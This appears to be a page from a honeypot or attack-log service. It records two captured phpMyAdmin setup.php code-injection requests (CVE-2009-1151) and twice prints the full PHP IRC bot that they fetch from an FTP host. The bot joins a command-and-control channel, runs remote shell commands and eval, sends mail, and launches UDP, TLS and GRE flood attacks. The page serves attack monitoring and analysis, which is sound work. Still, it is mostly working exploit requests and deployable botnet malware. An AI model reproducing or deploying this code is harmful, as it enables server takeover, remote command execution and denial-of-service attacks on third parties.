Help on available search operators
Operators
tag: filter by relevant keywords (e.g., shellshock)
port: filter by destination port
attacker: filter by attacker IP address
country: filter by attacker country (2 letters)
since: filter since provided date (dd/mm/yyyy format)
plugin: filter by plugin ID
resource: filter requests with a resource with the given MD5
Hints
The minus operator - can be used to exclude the results containing a given keyword.
You can combine different operators, or provide multiple values for each one using comma as separator.
e.g., port:80,8080
e.g., port:80 -scripts/setup.php
e.g., upload?org.apache.catalina.filters port:8080
1-10 of 88928 results (8893 pages)
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
64.137.241.24
Dest. port: 8080
Time: 10/12/2018 18:08:12
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31798 DataCity
Location: Ontario, Waterloo (BlackBerry 14) (zipcode N2L)
rDNS: notassigned.cloudatcost.com
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /myadmin/scripts/setup.php HTTP/1.1
Content-Length: 235
cookie2: $Version="1"
Host: 150.152.32.232:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://150.152.32.232:8080/myadmin/scripts/setup.php
cookie: phpMyAdmin=8b9c125f60efa70aebe2644e6fcea070
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=6f7368443376d090ceb5915c78d2b83d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A28%3A%22ftp%3A%2F%2F144%2E217%2E160%2E29%2FPMA%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 05fc9af5ffbc8d487682d2275fdf4983
Type: text/x-php
Size: 19345
URL: ftp://144.217.160.29/PMA.php
Php IRC bot for phpmyadmin exploit
go to line 86 to edit irc info
<?php
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru_($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))[email protected]_exec($command);
elseif(function_exists('popen')){[email protected]($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){[email protected]_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class sell
{
var $config = array("server"=>"144.217.160.29", "port"=>"443", "key"=>"", "prefix"=>"DDOS-", "maxrand"=>"8", "chan"=>"#pma", "trigger"=>"-", "password"=>"bleed", "auth"=>"");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$pass = $this->config['password'];
$alph = range("0","9");
$this->send("PASS ".$pass."");
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $ident = "Windows";
else $ident = "Linux";
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") {
$this->auth($this->config['auth']);
$this->join($this->config['chan'],$this->config['key']);
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->join("#PMA");
else $this->join("#PMA");
continue;
}
if(isset($cmd[1]) && $cmd[1]=="443") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case "PRIVMSG":
if(substr($mcmd[0],0,1)=="-")
{
switch(substr($mcmd[0],1))
{
case "mail":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "___":
$this->privmsg($this->config['chan'], "~http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for ($i = 0; $i < count($ret); $i++)
if ($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "udp":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udptls":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpstd":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "greflood":
if(count($mcmd)>4) { $this->greflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>3) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "die":
if(count($mcmd)>0) { fclose($this->conn); exit();}
break;
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function auth($chan) { $this->send("PART ".$chan); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$prefix = "DDOS-%s";
$nickk = substr(str_shuffle("1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $this->config['maxrand']);
$this->nick = sprintf($prefix, $nickk);
$this->send("NICK ".$this->nick);
}
function udpstd($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!STD\2]");
$msgg = "STD";
for($i=0;$i<$packetsize;$i++) { $msgg .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$msgg);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2 std DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udp($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udptls($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("tls://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function greflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("gre://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("gre://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function tcp($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2tcp started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen("tcp://".$host, $port, $e, $s, 5);
fclose($fp);
$i++;
}
$this->privmsg($this->config['chan'],"[\2tcp Finished!\2]: sent ".$i." connections to $host:$port.");
}
}
$poll = new sell;
$poll->start();
?>
phpMyAdmin (/scripts/setup.php) PHP Code Injection Exploit
[Attack info]
Attacker:
64.137.241.24
Dest. port: 8080
Time: 10/12/2018 18:08:11
Resource(s): [details]
Request: permalink
[Extra info]
ASN/ISP: AS31798 DataCity
Location: Ontario, Waterloo (BlackBerry 14) (zipcode N2L)
rDNS: notassigned.cloudatcost.com
Description
phpMyAdmin is prone to a remote PHP code-injection vulnerability on the page "setup.php". An attacker can exploit this issue to inject and execute arbitrary malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible. Versions prior to phpMyAdmin 2.11.9.5 and 3.1.3.1 are vulnerable.CVE
CVE-2009-1151Author
Adrian "pagvac" PastorPlugin ID
oosheefee1baixeinief5nociu5shohhPOST /2phpmyadmin/scripts/setup.php HTTP/1.1
Content-Length: 235
cookie2: $Version="1"
Host: 150.152.32.232:8080
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.01 [en]
connection: TE
referer: http://150.152.32.232:8080/2phpmyadmin/scripts/setup.php
cookie: phpMyAdmin=8b9c125f60efa70aebe2644e6fcea070
te: deflate,gzip;q=0.3
Content-Type: application/x-www-form-urlencoded
action=lay_navigation&eoltype=unix&token=6f7368443376d090ceb5915c78d2b83d&configuration=a%3A1%3A%7Bi%3A0%3BO%3A10%3A%22PMA%5FConfig%22%3A1%3A%7Bs%3A6%3A%22source%22%3Bs%3A28%3A%22ftp%3A%2F%2F144%2E217%2E160%2E29%2FPMA%2Ephp%22%3B%7D%7D
Resource ( 1 / 1 )
MD5: 05fc9af5ffbc8d487682d2275fdf4983
Type: text/x-php
Size: 19345
URL: ftp://144.217.160.29/PMA.php
Php IRC bot for phpmyadmin exploit
go to line 86 to edit irc info
<?php
set_time_limit(0);
error_reporting(0);
$dir = getcwd();
$uname= @php_uname();
function whereistmP()
{
$uploadtmp=ini_get('upload_tmp_dir');
$uf=getenv('USERPROFILE');
$af=getenv('ALLUSERSPROFILE');
$se=ini_get('session.save_path');
$envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
if(is_dir($uf) && is_writable($uf))return $uf;
if(is_dir($af) && is_writable($af))return $af;
if(is_dir($se) && is_writable($se))return $se;
if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
return '.';
}
function srvshelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$n=uniqid('NJ');
$cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
win32_start_service($n);
win32_stop_service($n);
win32_delete_service($n);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function ffishelL($command)
{
$name=whereistmP()."\\".uniqid('NJ');
$api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
$res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
while(!file_exists($name))sleep(1);
$exec=file_get_contents($name);
unlink($name);
return $exec;
}
function comshelL($command,$ws)
{
$exec=$ws->exec("cmd.exe /c $command");
$so=$exec->StdOut();
return $so->ReadAll();
}
function perlshelL($command)
{
$perl=new perl();
ob_start();
$perl->eval("system(\"$command\")");
$exec=ob_get_contents();
ob_end_clean();
return $exec;
}
function Exe($command)
{
$exec=$output='';
$dep[]=array('pipe','r');$dep[]=array('pipe','w');
if(function_exists('passthru')){ob_start();@passthru_($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
elseif(function_exists('shell_exec'))[email protected]_exec($command);
elseif(function_exists('popen')){[email protected]($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
elseif(function_exists('proc_open')){[email protected]_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=$output;proc_close($res);}
elseif(function_exists('win_shell_execute') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=winshelL($command);
elseif(function_exists('win32_create_service') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=srvshelL($command);
elseif(extension_loaded('ffi') && strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')$exec=ffishelL($command);
elseif(extension_loaded('perl'))$exec=perlshelL($command);
return $exec;
}
class sell
{
var $config = array("server"=>"144.217.160.29", "port"=>"443", "key"=>"", "prefix"=>"DDOS-", "maxrand"=>"8", "chan"=>"#pma", "trigger"=>"-", "password"=>"bleed", "auth"=>"");
var $users = array();
function start()
{
while(true)
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30))) $this->start();
$pass = $this->config['password'];
$alph = range("0","9");
$this->send("PASS ".$pass."");
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $ident = "Windows";
else $ident = "Linux";
$this->send("USER ".$ident." 127.0.0.1 localhost :".php_uname()."");
$this->set_nick();
$this->main();
}
}
function main()
{
while(!feof($this->conn))
{
if(function_exists('stream_select'))
{
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0)
{
fwrite($this->conn, "PING :lelcomeatme\r\n");
$read = array($this->conn);
$write = NULL;
$except = NULL;
$changed = stream_select($read, $write, $except, 30);
if($changed == 0) break;
}
}
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :") { $this->send("PONG :".substr($this->buf,6)); continue; }
if(isset($cmd[1]) && $cmd[1] =="001") {
$this->auth($this->config['auth']);
$this->join($this->config['chan'],$this->config['key']);
if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') $this->join("#PMA");
else $this->join("#PMA");
continue;
}
if(isset($cmd[1]) && $cmd[1]=="443") { $this->set_nick(); continue; }
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick) for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i+1];
else for($i=0;$i<count($msgcmd);$i++) $mcmd[$i] = $msgcmd[$i];
if(count($cmd)>2)
{
switch($cmd[1])
{
case "PRIVMSG":
if(substr($mcmd[0],0,1)=="-")
{
switch(substr($mcmd[0],1))
{
case "mail":
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: failed sending.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: sent.");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "___":
$this->privmsg($this->config['chan'], "~http://" . $_SERVER['SERVER_NAME'] . "" . $_SERVER['REQUEST_URI'] . "");
break;
case "uname":
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "on"; }
else { $safemode = "off"; }
$uname = php_uname();
$this->privmsg($this->config['chan'],"[\2info\2]: ".$uname." (safe: ".$safemode.")");
break;
case "raw":
$this->send(strstr($msg,$mcmd[1]));
break;
case "eval":
ob_start();
eval(strstr($msg,$mcmd[1]));
$exec=ob_get_contents();
ob_end_clean();
$ret = explode("\n",$exec);
for($i=0;$i<count($ret);$i++) if($ret[$i]!=NULL) $this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "exec":
$command = substr(strstr($msg, $mcmd[0]), strlen($mcmd[0]) + 1);
$exec = exec($command);
$ret = explode("\n", $exec);
for ($i = 0; $i < count($ret); $i++)
if ($ret[$i] != NULL)
$this->privmsg($this->config['chan'], " : " . trim($ret[$i]));
break;
case "udp":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udptls":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpstd":
if(count($mcmd)>3) { $this->udp($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "udpflood":
if(count($mcmd)>4) { $this->udpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "greflood":
if(count($mcmd)>4) { $this->greflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4]); }
break;
case "tcpconn":
if(count($mcmd)>3) { $this->tcpconn($mcmd[1],$mcmd[2],$mcmd[3]); }
break;
case "die":
if(count($mcmd)>0) { fclose($this->conn); exit();}
break;
}
}
break;
}
}
}
}
}
function send($msg) { fwrite($this->conn,$msg."\r\n"); }
function join($chan,$key=NULL) { $this->send("JOIN ".$chan." ".$key); }
function auth($chan) { $this->send("PART ".$chan); }
function privmsg($to,$msg) { $this->send("PRIVMSG ".$to." :".$msg); }
function notice($to,$msg) { $this->send("NOTICE ".$to." :".$msg); }
function set_nick()
{
$prefix = "DDOS-%s";
$nickk = substr(str_shuffle("1234567890ABCDEFGHIJKLMNOPQRSTUVWXYZ"), 0, $this->config['maxrand']);
$this->nick = sprintf($prefix, $nickk);
$this->send("NICK ".$this->nick);
}
function udpstd($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!STD\2]");
$msgg = "STD";
for($i=0;$i<$packetsize;$i++) { $msgg .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$msgg);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2 std DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udp($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udptls($host,$port,$time) {
$packetsize = 65500;
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$i = 0;
$fp = fsockopen("tls://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS Finished\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function udpflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("udp://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("udp://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function greflood($host,$port,$time,$packetsize) {
$this->privmsg($this->config['chan'],"[\2BOTS DDOSING!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(rand(1,256)); }
$end = time() + $time;
$multitarget = false;
if(strpos($host, ",") !== FALSE)
{
$multitarget = true;
$host = explode(",", $host);
}
$i = 0;
if($multitarget)
{
$fp = array();
foreach($host as $hostt) $fp[] = fsockopen("gre://".$hostt,$port,$e,$s,5);
$count = count($host);
while(true)
{
fwrite($fp[$i % $count],$packet);
fflush($fp[$i % $count]);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
foreach($fp as $fpp) fclose($fpp);
} else {
$fp = fsockopen("gre://".$host,$port,$e,$s,5);
while(true)
{
fwrite($fp,$packet);
fflush($fp);
if($i % 100 == 0)
{
if($end < time()) break;
}
$i++;
}
fclose($fp);
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2DDOS ENDED!\2]: ".$env." MB sent / Average: ".$vel." MB/s ");
}
function tcp($host,$port,$time)
{
$this->privmsg($this->config['chan'],"[\2tcp started!\2]");
$end = time() + $time;
$i = 0;
while($end > time())
{
$fp = fsockopen("tcp://".$host, $port, $e, $s, 5);
fclose($fp);
$i++;
}
